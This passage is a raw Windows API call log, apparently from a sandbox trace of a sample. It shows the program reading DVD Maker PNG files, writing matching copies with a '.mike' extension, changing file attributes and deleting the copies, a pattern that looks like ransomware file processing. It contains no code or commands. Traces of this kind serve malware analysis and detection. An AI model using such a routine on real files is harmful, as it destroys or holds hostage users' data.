Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.182] WriteFile (in: hFile=0x288, lpBuffer=0x22c4584*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22c4584*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.182] CloseHandle (hObject=0x288) returned 1 [0066.182] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.183] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.184] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0066.185] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.185] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.185] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.187] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.188] WriteFile (in: hFile=0x288, lpBuffer=0x22c9c70*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22c9c70*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.188] CloseHandle (hObject=0x288) returned 1 [0066.189] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.189] ReadFile (in: hFile=0x288, lpBuffer=0x22cade4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22cade4*, lpNumberOfBytesRead=0x2af080*=0x13a1, lpOverlapped=0x0) returned 1 [0066.190] CloseHandle (hObject=0x288) returned 1 [0066.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.192] WriteFile (in: hFile=0x288, lpBuffer=0x22d7548*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22d7548*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.192] CloseHandle (hObject=0x288) returned 1 [0066.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.193] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.194] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpFilePart=0x0) returned 0x56 [0066.194] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.195] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5b [0066.195] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png.mike")) returned 1 [0066.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.197] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.198] WriteFile (in: hFile=0x288, lpBuffer=0x22dccec*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22dccec*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.199] CloseHandle (hObject=0x288) returned 1 [0066.199] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.199] ReadFile (in: hFile=0x288, lpBuffer=0x22dde78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22dde78*, lpNumberOfBytesRead=0x2af080*=0xc2e, lpOverlapped=0x0) returned 1 [0066.200] CloseHandle (hObject=0x288) returned 1 [0066.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.201] WriteFile (in: hFile=0x288, lpBuffer=0x22e568c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22e568c*, lpNumberOfBytesWritten=0x2af074*=0xc30, lpOverlapped=0x0) returned 1 [0066.201] CloseHandle (hObject=0x288) returned 1 [0066.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.203] WriteFile (in: hFile=0x288, lpBuffer=0x22e8918*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22e8918*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.203] CloseHandle (hObject=0x288) returned 1 [0066.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.203] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5c [0066.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x61 [0066.205] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png.mike")) returned 1 [0066.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.207] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.208] WriteFile (in: hFile=0x288, lpBuffer=0x22edf70*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22edf70*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.209] CloseHandle (hObject=0x288) returned 1 [0066.209] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.209] ReadFile (in: hFile=0x288, lpBuffer=0x22ef0d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22ef0d8*, lpNumberOfBytesRead=0x2af080*=0x135b, lpOverlapped=0x0) returned 1 [0066.211] CloseHandle (hObject=0x288) returned 1 [0066.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.213] WriteFile (in: hFile=0x288, lpBuffer=0x22fb644*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22fb644*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.213] CloseHandle (hObject=0x288) returned 1 [0066.213] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.213] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.213] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.213] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpFilePart=0x0) returned 0x53 [0066.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x58 [0066.215] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png.mike")) returned 1 [0066.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x59 [0066.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x59 [0066.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x59 [0066.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.217] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x59 [0066.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.220] WriteFile (in: hFile=0x288, lpBuffer=0x2300cbc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2300cbc*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.221] 